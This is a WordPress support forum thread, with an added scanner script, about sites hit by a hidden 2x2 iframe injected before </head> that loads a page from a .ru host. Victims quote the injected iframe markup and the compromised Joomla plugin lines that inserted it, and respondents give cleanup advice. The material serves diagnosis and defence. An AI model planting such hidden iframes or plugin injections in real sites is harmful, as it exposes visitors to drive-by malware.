
[closed] New malware code injection attack (11 posts)

  1. hauman
    Member
    Posted 1 year ago #

    This is being injected into my site (sfscope.com):

    <iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe></head>

    I'm searching for where it could be coming from in WP; right now, I'm just trying to clean the site.

  2. B.Tom
    Member
    Posted 1 year ago #

    Same thing here.
    My webhost is OVH.
    I don't know from where the iframe has been injected, but it's not only for one website.
    I've some non-wordpress websites that have been infected too.
    All my files, on my server, with the ".php" extension that contain a <body> tag got the iframe placed above.

    I've detected that one of my websites had a blank page. It's based on the Joomla CMS, ver 1.5. It's possible that the attack comes from this one. There's a Joomla plugin which is called "bigshotgoogleanalytics". I found two lines at the end of the .php plugin that add the iframe at the body:

    $buffer = str_replace ("<iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe></head>", $google_analytics_javascript."<iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe></head>", $buffer);
    JResponse::setBody($buffer);

    If someone has some news about that, thanks.

  3. cjchamberland
    Member
    Posted 1 year ago #

    What you have is typically an FTP account compromise or timthumb vulnerability but without checking the server logs for sure, it's just an assumption.

    Work your way through these resources and follow all instructions to completely clean your site or you may be hacked again. See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex.

    Change all passwords. Scan your own PC.

    Tell your web host you got hacked; and consider changing to a more secure host: Recommended WordPress Web Hosting

  4. hauman
    Member
    Posted 1 year ago #

    A few things:

    * It seems to be a WP 3.5 injection attack of some sort; there are older WP installs on the same server that are completely untouched. There may be a security hole somewhere in WP 3.5.

    * The code is injected everywhere it comes across </head>: header.php, custom-header.php, comments, plugins (a few times in Jetpack), active themes, inactive themes, etc.
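
One way to locate every copy of the iframe described in posts 1, 2 and 4, as an added example that is not part of the original thread: it flags any near-invisible iframe placed directly before </head> in files under a directory. The `MAX_PX` threshold, the function names, the sample files and the `malicious.example` host are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# An <iframe> placed directly before </head>; its size attributes are checked separately.
INJECTED = re.compile(r'<iframe\b([^>]*)>\s*</iframe>\s*(?=</head>)', re.I)
DIM = re.compile(r'\b(width|height)\s*=\s*["\']?(\d+)', re.I)
SRC = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
MAX_PX = 5  # assumption: an iframe this small is meant to be invisible

def find_injections(text):
    """Return (line_number, src) for each hidden iframe sitting right before </head>."""
    hits = []
    for m in INJECTED.finditer(text):
        dims = {k.lower(): int(v) for k, v in DIM.findall(m.group(1))}
        if max(dims.get('width', MAX_PX + 1), dims.get('height', MAX_PX + 1)) <= MAX_PX:
            src = SRC.search(m.group(1))
            hits.append((text.count('\n', 0, m.start()) + 1, src.group(1) if src else ''))
    return hits

def scan_tree(root, suffixes=('.php', '.html', '.htm')):
    """Map each affected file under root (relative path) to its list of hits."""
    report = {}
    for path in sorted(Path(root).rglob('*')):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_injections(path.read_text(errors='replace'))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed sample tree (not real site files); malicious.example is a placeholder host.
IFRAME = '<iframe src="http://malicious.example/update.php" width="2" height="2" frameborder="0"></iframe>'
SAMPLES = {
    'theme/header.php': '<html>\n<head>\n<title>x</title>\n' + IFRAME + '</head>\n<body>',
    'plugin/analytics.php': '<?php\n$b = str_replace("' + IFRAME + '</head>", $js."' + IFRAME + '</head>", $b);',
    'theme/footer.php': '<?php wp_footer(); ?>\n</body></html>',
    'theme/embed.php': '<head><iframe src="/map" width="600" height="400"></iframe></head>',
}

def demo():
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            (Path(root) / rel).parent.mkdir(parents=True, exist_ok=True)
            (Path(root) / rel).write_text(body)
        return scan_tree(root)

if __name__ == '__main__':
    for name, hits in demo().items():
        print(name, hits)
```

Hits inside PHP string literals, as in the plugin lines from post 2, are reported as well, since the injection rewrote those strings too.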

  5. esmi
    Forum Moderator
    Posted 1 year ago #

    There may be a security hole somewhere in WP 3.5.

    There are no known security issues in WordPress 3.5. Your site being hacked does not imply any issues in the current version of WordPress. In fact the code you posted above looks like a typical injection hack on an insecure server or following an ftp leak. Follow cjchamberland's advice.

  6. hauman
    Member
    Posted 1 year ago #

    There are no known security issues in WordPress 3.5. Your site being hacked does not imply any issues in the current version of WordPress.

    Doing that as well; merely noting that the injection attack is only affecting WP3.5 installs on this server, and nothing earlier.

  7. mtalt
    Member
    Posted 1 year ago #

    We have also been having this issue with the same iframe since this morning. We are working with our hosting company to get to the cause of the problem. I will post here if we learn anything.

  8. vadim s. sabinich
    Member
    Posted 1 year ago #

  9. rodrigopolo
    Member
    Posted 1 year ago #

    I'm sure that there is something on version 3.5 or some plug-ins because someone was unable to write a file on my server and I have the latest version!

  10. esmi
    Forum Moderator
    Posted 1 year ago #

  11. esmi
    Forum Moderator
    Posted 1 year ago #

    And post your own topics.

Topic Closed

This topic has been closed to new replies.